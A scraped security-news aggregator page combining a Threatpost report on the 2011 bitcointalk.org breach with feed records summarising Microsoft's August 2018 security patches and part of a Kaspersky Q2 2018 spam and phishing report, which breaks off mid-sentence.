BitCoin Forum Hacked, Injected With Bill Cosby Images

Description

A hacker compromised a digital currency forum, bitcointalk.org, stealing email addresses and hashed passwords, reading messages, and, of all things, peppering the site with images Bill Cosby, according to a report from SC Magazine.

The report claims that the attacker gained root access and started running arbitrary PHP code in early September. The compromise was not detected until a week later, when that person injected JavaScript onto the forum, causing pictures of the one-time Jell-O spokesperson and pudding enthusiast to follow users across the forum, replacing all references to BitCoin with CosbyCoin.

The attacker reportedly used SQL injection to exploit a vulnerability in the way the forum software handled escape characters in usernames and eventually purchased a donor account, using it to gain access to various user accounts and change their names, including that of the administrator, Satoshi.

Evidently the passwords were hashed with the SHA-1 algorithm and salted by combining them with usernames. In typical fashion, the administrators encouraged users to change not only their bitcointalk.org passwords, but also any similar or shared passwords for other sites and services.

The forum has since been shut down and migrated to a new host, according to the report.

This isn’t the first time the emerging digital currency market has been targeted by online criminals. In fact, Mt. Gox, one of the most popular bitcoin exchange markets, was hacked earlier this year. Additionally, reports emerged a few weeks ago detailing the discovery of a peer-to-peer bitcoin mining botnet.

All product names, logos, and brands are property of their respective owners. All company, product and service names used in this website are for identification purposes only. Use of these names, logos, and brands does not imply endorsement.If you are an owner of some content and want it to be removed, please mail to content@vulners.com Vulners, 2018

Protected by

{"enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "reporter": "Brian Donohue", "id": "BITCOIN-FORUM-HACKED-INJECTED-BILL-COSBY-IMAGES-091211/75646", "modified": "2013-04-17T20:07:12", "published": "2011-09-12T20:14:00", "threatPostCategory": "Uncategorized", "history": [], "bulletinFamily": "info", "viewCount": 10, "cvelist": [], "type": "threatpost", "hash": "878f75fd377fe3f6b709787d1f115ea25b4008c470d058534bd4c3db11d7f145", "references": ["https://threatpost.com/dropbox-forces-password-reset-for-older-users/120184/", "https://threatpost.com/miner-botnet-bitcoin-mining-goes-peer-peer-081911/", "https://threatpost.com/fairware-attacks-targeting-linux-servers/120254/", "https://threatpost.com/academics-devise-new-way-to-steal-data-from-air-gapped-computers/119858/", "http://www.scmagazine.com.au/News/271688,bitcoin-forum-hacked-by-donor.aspx", "https://threatpost.com/bitcoin-forum-hacked-injected-bill-cosby-images-091211/"], "description": "[![Bitcoin](https://trtpost-wpengine.netdna-ssl.com/files/2013/04/bitcoins.jpg)](<https://threatpost.com/bitcoin-forum-hacked-injected-bill-cosby-images-091211/>)A hacker compromised a digital currency forum, bitcointalk.org, stealing email addresses and hashed passwords, reading messages, and, of all things, peppering the site with images Bill Cosby, according to [a report from SC Magazine](<http://www.scmagazine.com.au/News/271688,bitcoin-forum-hacked-by-donor.aspx>).\n\nThe report claims that the attacker gained root access and started running arbitrary PHP code in early September. The compromise was not detected until a week later, when that person injected JavaScript onto the forum, causing pictures of the one-time Jell-O spokesperson and pudding enthusiast to follow users across the forum, replacing all references to BitCoin with CosbyCoin.\n\n### Related Posts\n\n#### [Fairware Attacks Targeting Linux Servers](<https://threatpost.com/fairware-attacks-targeting-linux-servers/120254/> \"Permalink to Fairware Attacks Targeting Linux Servers\" )\n\nAugust 31, 2016 , 10:21 am\n\n#### [Dropbox Forces Password Reset for Older Users](<https://threatpost.com/dropbox-forces-password-reset-for-older-users/120184/> \"Permalink to Dropbox Forces Password Reset for Older Users\" )\n\nAugust 29, 2016 , 9:58 am\n\n#### [Academics Devise New Way to Steal Data from Air-Gapped Computers](<https://threatpost.com/academics-devise-new-way-to-steal-data-from-air-gapped-computers/119858/> \"Permalink to Academics Devise New Way to Steal Data from Air-Gapped Computers\" )\n\nAugust 12, 2016 , 11:01 am\n\nThe attacker reportedly used SQL injection to exploit a vulnerability in the way the forum software handled escape characters in usernames and eventually purchased a donor account, using it to gain access to various user accounts and change their names, including that of the administrator, Satoshi.\n\nEvidently the passwords were hashed with the SHA-1 algorithm and salted by combining them with usernames. In typical fashion, the administrators encouraged users to change not only their bitcointalk.org passwords, but also any similar or shared passwords for other sites and services.\n\nThe forum has since been shut down and migrated to a new host, according to the report.\n\nThis isn\u2019t the first time the emerging digital currency market has been targeted by online criminals. In fact, Mt. Gox, one of the most popular bitcoin exchange markets, was hacked earlier this year. Additionally, reports emerged a few weeks ago detailing the discovery of [a peer-to-peer bitcoin mining botnet](<https://threatpost.com/miner-botnet-bitcoin-mining-goes-peer-peer-081911/>).", "title": "BitCoin Forum Hacked, Injected With Bill Cosby Images", "href": "https://threatpost.com/bitcoin-forum-hacked-injected-bill-cosby-images-091211/75646/", "lastseen": "2016-09-04T20:48:36", "edition": 1, "objectVersion": "1.2", "cvss": {"score": 0.0, "vector": "NONE"}}

{"result": {"talosblog": [{"lastseen": "2018-08-14T20:32:04", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Microsoft released its monthly set of security advisories today for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 62 new vulnerabilities, 20 of which are rated \u201ccritical,\u201d 38 that are rated \u201cimportant,\u201d one that is rated moderate and one that is rated as low severity. These vulnerabilities impact Windows Operating System, Edge and Internet Explorer, along with several other products.\n\n \n\n\nIn addition to the 60 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180020 which addresses the vulnerabilities described in the Adobe Flash Security Bulletin APSB18-25.\n\n \n\n\n### Critical Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 20 vulnerabilities that are rated \"critical.\" Talos believes 10 of these are notable and require prompt attention.\n\n \n\n\n[CVE-2018-8273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>) is a remote code execution vulnerability in the Microsoft SQL Server that could allow an attacker who successfully exploits the vulnerability to execute code in the context of the SQL Server Database Engine Service account.\n\n \n\n\n[CVE-2018-8302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8302>) is a remote code execution vulnerability in the Microsoft Exchange email and calendar software that could allow an attacker who successfully exploits the vulnerability to run arbitrary code in the context of the system user when the software fails to properly handle objects in memory.\n\n \n\n\n[CVE-2018-8344](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8344>) is a remote code execution vulnerability that exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document that is designed to exploit the vulnerability, and then convince users to open the document file.\n\n \n\n\n[CVE-2018-8350](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8350>) is a remote code execution vulnerability that exists when the Microsoft Windows PDF Library improperly handles objects in memory. An attacker who successfully exploits the vulnerability could gain the same user rights as the current user. The vulnerability can be exploited simply by viewing a website that hosts a malicious PDF file on a Windows 10 system with Microsoft Edge set as the default browser. On other affected systems, that do not render PDF content automatically, an attacker would have to convince users to open a specially crafted PDF document, such as a PDF attachment to an email message.\n\n \n\n\n[CVE-2018-8266](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8266>), [CVE-2018-8355](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8355>), [CVE-2018-8380](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8380>), [CVE-2018-8381](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8381>) and [CVE-2018-8384](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8384>) are remote code execution vulnerabilities that exist in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge. An attacker who successfully exploits the vulnerability can potentially gain the same user rights as the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements.\n\n \n\n\n[CVE-2018-8397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8397>) is a remote code execution vulnerability that exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploits this vulnerability could take control of the affected system. This vulnerability can be exploited in multiple ways. By leveraging a web-based attack, an attacker can convince a user to visit a webpage that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker-controlled webpage, or simply a page that hosts external content, such as advertisements. An attacker can also provide a specially crafted document file that is designed to exploit the vulnerability, and then convince users to open the document file.\n\nOther vulnerabilities deemed \"critical\" are listed below:\n\n \n\n\n[CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>) LNK Remote Code Execution Vulnerability\n\n[CVE-2018-8359](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8359>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8371](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8371>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8372](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8372>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8377](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8377>) Microsoft Edge Memory Corruption Vulnerability\n\n[CVE-2018-8385](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8385>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8387](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8387>) Microsoft Edge Memory Corruption Vulnerability\n\n[CVE-2018-8390](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8390>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8403](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8403>) Microsoft Browser Memory Corruption Vulnerability\n\n### Important Vulnerabilities\n\n \n\n\nThis month, Microsoft is addressing 38 vulnerabilities that are rated \"important.\" Talos believes two of these are notable and require prompt attention.\n\n \n\n\n[CVE-2018-8200](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8200>) is a vulnerability that exists in Device Guard that could allow an attacker to inject malicious code into a Windows PowerShell session. An attacker who successfully exploits this vulnerability can potentially inject code into a trusted PowerShell process to bypass the Device Guard code integrity policy on the local machine. To exploit the vulnerability, an attacker would first have to access the local machine and then inject malicious code into a script that is trusted by the policy. The injected code would then run with the same trust level as the script and bypass the policy.\n\n \n\n\n[CVE-2018-8340](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8340>) is a vulnerability in the Windows Authentication Methods, and enables an Active Directory Federation Services (AD FS) Security Bypass vulnerability. An attacker who successfully exploits this vulnerability could bypass some, but not all, of the authentication factors.\n\n \n\n\nOther vulnerabilities deemed \"important\" are listed below:\n\n \n\n\n[CVE-2018-0952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0952>) Diagnostic Hub Standard Collector Elevation Of Privilege Vulnerability\n\n[CVE-2018-8204](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8204>) Device Guard Code Integrity Policy Security Feature Bypass Vulnerability\n\n[CVE-2018-8253](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8253>) Cortana Elevation of Privilege Vulnerability\n\n[CVE-2018-8316](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8316>) Internet Explorer Remote Code Execution Vulnerability\n\n[CVE-2018-8339](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8339>) Windows Installer Elevation of Privilege Vulnerability\n\n[CVE-2018-8341](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8341>) Windows Kernel Information Disclosure Vulnerability\n\n[CVE-2018-8342](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8342>) Windows NDIS Elevation of Privilege Vulnerability\n\n[CVE-2018-8343](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8343>) Windows NDIS Elevation of Privilege Vulnerability\n\n[CVE-2018-8346](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8346>) LNK Remote Code Execution Vulnerability\n\n[CVE-2018-8347](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8347>) Windows Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8348](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8348>) Windows Kernel Information Disclosure Vulnerability\n\n[CVE-2018-8349](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8349>) Microsoft COM for Windows Remote Code Execution Vulnerability\n\n[CVE-2018-8351](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8351>) Microsoft Edge Information Disclosure Vulnerability\n\n[CVE-2018-8353](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8353>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8357](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8357>) Microsoft Browser Elevation of Privilege Vulnerability\n\n[CVE-2018-8358](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8358>) Microsoft Browser Security Feature Bypass Vulnerability\n\n[CVE-2018-8360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8360>) .NET Framework Information Disclosure Vulnerability\n\n[CVE-2018-8370](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8370>) Microsoft Edge Information Disclosure Vulnerability\n\n[CVE-2018-8375](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8375>) Microsoft Excel Remote Code Execution Vulnerability\n\n[CVE-2018-8376](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8376>) Microsoft PowerPoint Remote Code Execution Vulnerability\n\n[CVE-2018-8378](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8378>) Microsoft Office Information Disclosure Vulnerability\n\n[CVE-2018-8379](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8379>) Microsoft Excel Remote Code Execution Vulnerability\n\n[CVE-2018-8382](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8382>) Microsoft Excel Information Disclosure Vulnerability\n\n[CVE-2018-8383](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8383>) Microsoft Edge Spoofing Vulnerability\n\n[CVE-2018-8389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8389>) Scripting Engine Memory Corruption Vulnerability\n\n[CVE-2018-8394](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8394>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8396](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8396>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8398>) Windows GDI Information Disclosure Vulnerability\n\n[CVE-2018-8399](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8399>) Win32k Elevation of Privilege Vulnerability\n\n[CVE-2018-8400](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8400>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8401](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8401>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8404](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8404>) Win32k Elevation of Privilege Vulnerability\n\n[CVE-2018-8405](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8405>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8406](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8406>) DirectX Graphics Kernel Elevation of Privilege Vulnerability\n\n[CVE-2018-8412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8412>) Microsoft (MAU) Office Elevation of Privilege Vulnerability\n\n[CVE-2018-8414](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8414>) Windows Shell Remote Code Execution Vulnerability\n\n### Coverage\n\n \n\n\nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.\n\n \n\n\nSnort Rules:\n\n \n\n\n45877-45878, 46548-46549, 46999-47002, 47474-47493, 47495-47496, 47503-47504, 47512-47513, 47515-47520\n\n \n![](http://feeds.feedburner.com/~r/feedburner/Talos/~4/8ZjMNLg4_Bs)", "reporter": "noreply@blogger.com (Earl Carter)", "published": "2018-08-14T11:26:00", "type": "talosblog", "title": "Microsoft Tuesday August 2018", "enchantments": {"score": {"modified": "2018-08-14T20:32:04", "vector": "NONE", "value": 10.0}}, "bulletinFamily": "blog", "cvelist": ["CVE-2018-0952", "CVE-2018-8200", "CVE-2018-8204", "CVE-2018-8253", "CVE-2018-8266", "CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8316", "CVE-2018-8339", "CVE-2018-8340", "CVE-2018-8341", "CVE-2018-8342", "CVE-2018-8343", "CVE-2018-8344", "CVE-2018-8345", "CVE-2018-8346", "CVE-2018-8347", "CVE-2018-8348", "CVE-2018-8349", "CVE-2018-8350", "CVE-2018-8351", "CVE-2018-8353", "CVE-2018-8355", "CVE-2018-8357", "CVE-2018-8358", "CVE-2018-8359", "CVE-2018-8360", "CVE-2018-8370", "CVE-2018-8371", "CVE-2018-8372", "CVE-2018-8373", "CVE-2018-8375", "CVE-2018-8376", "CVE-2018-8377", "CVE-2018-8378", "CVE-2018-8379", "CVE-2018-8380", "CVE-2018-8381", "CVE-2018-8382", "CVE-2018-8383", "CVE-2018-8384", "CVE-2018-8385", "CVE-2018-8387", "CVE-2018-8389", "CVE-2018-8390", "CVE-2018-8394", "CVE-2018-8396", "CVE-2018-8397", "CVE-2018-8398", "CVE-2018-8399", "CVE-2018-8400", "CVE-2018-8401", "CVE-2018-8403", "CVE-2018-8404", "CVE-2018-8405", "CVE-2018-8406", "CVE-2018-8412", "CVE-2018-8414"], "_object_type": "robots.models.rss.RssBulletin", "modified": "2018-08-14T18:26:00", "id": "TALOSBLOG:A9E55A97439608C62C1BF62669B8074A", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/8ZjMNLg4_Bs/ms-tuesday.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "securelist": [{"lastseen": "2018-08-14T10:31:27", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "references": [], "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2014/08/08075241/quarter_spam.jpg)\n\n## Quarterly highlights\n\n### GDPR as a phishing opportunity\n\nIn the first quarter, we discussed spam designed to exploit GDPR (General Data Protection Regulation), which came into effect on May 25, 2018. Back then spam traffic was limited to invitations to participate in workshops and other educational events and purchase software or databases. We predicted that fraudulent emails were soon to follow. And we found them in the second quarter.\n\nAs required by the regulation, companies notified email recipients that they were switching to a new GDPR-compliant policy and asked them to confirm permission to store and process personal information. This was what criminals took advantage of. To gain access to the personal information of well-known companies' customers, criminals sent out phishing emails referencing the GDPR and asking recipients to update their account information. To do this, customers had to click on the link provided and enter the requested data, which immediately fell into the hands of the criminals. It must be noted that the attackers were targeting customers of financial organizations and IT service providers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122429/180810-spam-report-q2-18-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122429/180810-spam-report-q2-18-1.png>)\n\n_Phishing emails exploiting GDPR_\n\n### Malicious IQY attachments\n\nIn the second quarter, we uncovered several malspam incidents with never-before-seen IQY (Microsoft Excel Web Query) attachments. Attackers disguise these files as invoices, order forms, document copies, etc., which is a known ploy that is still actively used for malspamming. The From field contains addresses that look like personal emails, and names of attachments are generated in accordance with the following template: the name of the attachment, and then either a date or a random number sequence.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122440/180810-spam-report-q2-18-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122440/180810-spam-report-q2-18-2.png>)\n\n_Harmful .iqy files_\n\nWhen the victim opens the IQY file, the computer downloads several trojan-downloaders, which install the Flawed Ammyy RAT backdoor. The infection chain may look like this: Trojan-Downloader.MSExcel.Agent downloads another downloader from the same family, which, in turn, downloads Trojan-Downloader.PowerShell.Agent, then this trojan downloads Trojan-Downloader.Win32.Dapato, which finally installs the actual Backdoor.Win32.RA-based.hf (also known as Flawed Ammyy RAT) used to gain remote access to the victim's computer, steal files and personal information, and send spam.\n\nIt is rather difficult to detect these attachments because these files look like ordinary text documents which transfer web-inquiry data transfer parameters from remote sources to Excel spreadsheets. IQY files can also be a very dangerous tool in the hands of criminals because their structure is no different from the structure of legitimate files, yet they can be used to download any data at all.\n\nIt must be noted that malspam with IQY attachments is distributed via the largest botnet called Necurs. As a reminder, this is the botnet responsible for malspam (ransomware, macro-viruses, etc.), as well as pump-and-dump and dating spam. The botnet's operation is characterized by periods of spiking and idling while infection and filter evasion mechanisms become ever more sophisticated.\n\n### Data leaks\n\nThe wave of confidential information leaks we discussed in the previous quarter is still on the rise. Here are some of the most notable events of the quarter:\n\n * Hacking and theft of personal information of 27M Ticketfly customers;\n * 92M MyHeritage genealogy service users' personal information was discovered on a public server;\n * 340M individual records were lost by Exactis, a marketing company;\n * An unprotected Amazon server allowed access to the personal information of 48M Facebook, LinkedIn, Twitter, and Zillow users.\n\nAs a result of such leaks, cybercriminals get a hold of users' names, email addresses, phone numbers, dates of birth, credit card numbers, and personal preferences. This information may later be used to launch targeted phishing attacks, which are the most dangerous type of phishing.\n\n### Cryptocurrency\n\nIn the second quarter, our antiphishing system prevented 58,000 user attempts to connect to phishing websites masquerading as popular cryptocurrency wallets and markets. In addition to classic phishing, which aims at gaining access to the victim's accounts and private key information, cybercriminals try every way to entice a victim to willingly send them cryptocurrency. One of the examples of this are cryptocoin giveaways. Cybercriminals continue using the names of new ICO projects to collect money from potential investors that are trying to gain early access to new tokens. Sometimes phishing sites pop up before official project sites.\n\nEthereum (ETH) is currently the most popular cryptocurrency with phishers. The popularity of Ethereum with cybercriminals increases as more funds are attracted by [ICOs on the Ethereum platform](<https://www.kaspersky.ru/blog/ethereum-ico/19025/>). According to our very rough estimate (based on data received from over a thousand ETH wallets used by malefactors), over the Q2 2018, cybercriminals exploiting ICOs [managed to make](<https://securelist.com/in-cryptoland-trust-can-be-costly/86367/>) $2,329,317 (end-of-July-2018 exchange rate), traditional phishing not included.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122449/180810-spam-report-q2-18-3.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122449/180810-spam-report-q2-18-3.png>)\n\n_Fake ICO project pages: the first is located on fantom.pub and imitates fantom.foundation, the real site of the FANTOM project; the second one, found on sparkster.be, is an imitation of sparkster.me, the original SPARKSTER site_\n\n### World Cup 2018\n\nCybercriminals from all over the world prepared for the World Cup as much as its organizers and soccer fans. The World Cup was used in many traditional scamming methods using social engineering. Cybercriminals created fake championship partner websites to gain access to victims' bank and other accounts, carried out targeted attacks, and created [bogus fifa.com account sign-in pages](<https://securelist.ru/2018-fraud-world-cup/90108/>).\n\n### HTTPS\n\n[As mentioned in the 2017 report](<https://securelist.com/spam-and-phishing-in-2017/83833/#phishing-pages-migrate-to-https>), more and more phishing pages are now found on [certified](<https://encyclopedia.kaspersky.ru/glossary/digital-certificates/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) domains. Those may include hacked or specially registered domains that cybercriminals use to store their content. This has to do with the fact that most of the Internet is switching to HTTPS and it has become easy to get a simple certificate. In the middle of the second quarter, this prompted Google to [announce future efforts](<https://blog.chromium.org/2018/05/evolving-chromes-security-indicators.html>) aimed at changing the way Chrome works with certificates. Starting in September 2018, the browser (Chrome 69) will stop marking HTTPS sites as \"Secure\" in the URL bar. Instead, starting in October 2018, Chrome will start displaying the \"Not secure\" label when users enter data on unencrypted sites. \n\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10123710/180810-spam-report-q2-18-3-5.gif)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10123710/180810-spam-report-q2-18-3-5.gif>)\n\n_When Chrome 70 comes out in October 2018, a red \"Not secure\" marker will be displayed for all HTTP sites where users enter data._\n\nGoogle believes that this will make more sites use encryption. After all, users should expect the web to be safe by default and receive warnings only in the event of any issues.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122456/180810-spam-report-q2-18-4.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122456/180810-spam-report-q2-18-4.png>)\n\n_An example of a certified phishing website marked as \"Secure\"._\n\nAt the moment, the green Secure message in the URL bar is rather misleading for a user, especially when they visit a phishing website.\n\n### Vacation season\n\nIn anticipation of the vacation season, cybercriminals have used all of the possible topics that may interest travelers, [from airplane ticket purchases to hotel bookings](<https://www.kaspersky.com/blog/protect-your-vacation/22352>). For instance, we've found many websites that offer very tempting accommodations at absurd prices (e.g., an entire four-bedroom house in Prague with a pool and a fireplace at $1,000 a month). Such websites pose as Amazon, TripAdvisor, and other sites popular among travelers.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122505/180810-spam-report-q2-18-5.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122505/180810-spam-report-q2-18-5.png>)\n\n_An example of a fake hotel booking website_\n\nA similar method is used to fake ticket aggregator websites. In these cases, the displayed flight information is real, but the tickets turn out to be fake.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122513/180810-spam-report-q2-18-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122513/180810-spam-report-q2-18-6.png>)\n\n_An example of fake airline ticket websites_\n\n## Distribution channels\n\nIn our reports, we regularly point out you that phishing and other spam has gone way beyond email a long time ago. Attackers use every means of communication at their disposal and even recruit unsuspecting users themselves for malware distribution. In this quarter, most large-scale attacks were found in messengers and on social networks.\n\n### WhatsApp\n\nCybercriminals have been using WhatsApp more frequently to distribute their content lately. WhatsApp users copy and resend spam messages themselves, just like they used to do with luck chain letters many years ago. Most of these messages contain information about fictional lotteries or giveaways (we have already discussed these types of scams many times). Last quarter, cybercriminals brought back the airplane ticket giveaways. This quarter in Russia, for instance, they used names of [popular retailers](<https://www.kaspersky.ru/blog/coupon-scam/20830>) such as Pyaterochka and Leroy Merlin, and also McDonald's. Some fake messages come from popular sportswear brands, as well as certain stores and coffee shops.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122520/180810-spam-report-q2-18-6-5.jpg)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122520/180810-spam-report-q2-18-6-5.jpg>)\n\n_Users share messages about ticket raffles with their contacts via a messenger since it's one of the conditions for winning_\n\nOnce a user has sent the message to some friends, he or she is redirected to another resource, the content of which changes depending on the victim's location and device. If the user visits the site from their smartphone, most often they are automatically subscribed to paid services. The user may also be redirected to a page containing a survey or a lottery or to some other malicious website. For instance, a user may be invited to install a browser extension which will later intercept the data they enter on other websites and use their name to do other things online, such as publish posts on social media.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122527/180810-spam-report-q2-18-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122527/180810-spam-report-q2-18-7.png>)\n\n_An example of a page which a user is redirected to after a survey, at the end of which they were promised a coupon to be used in a popular retail chain. As you can see, no coupon has been received, but the user is invited to install a browser extension with suspicious permissions._\n\n### Twitter and Instagram\n\nCybercriminals have been using Twitter to distribute fraudulent content for a long time. However, it has recently become a breeding ground for fake celebrity and company accounts.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122533/180810-spam-report-q2-18-8.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/08/10122533/180810-spam-report-q2-18-8.png>)\n\n_Fake account for Pavel Durov_\n\nThe most popular cover used by cybercriminals is cryptocurrency giveaways on behalf of celebrities. The user is asked to transfer a small amount of cryptocurrency to a certain wallet to get double or triple coins back. To enhance trust, the wallet may be located on a separate website, which also contains a list of fake transactions that the victim can see \"updating\" in real time, which confirms that any person who transfers money to the fake wallet gets back several times the amount transferred. Of course, the victim does not receive anything. Despite the simplicity of this scheme, it makes cybercriminals millions of dollars. This quarter, cybercriminals favoured the names of Elon Musk, Pavel Durov, and Vitalik Buterin in their schemes. These names were chosen for a reason \u2014 Elon Musk is an entrepreneur, inventor, and investor, while Durov and Buterin made it to the cryptocurrency market leader list [published by 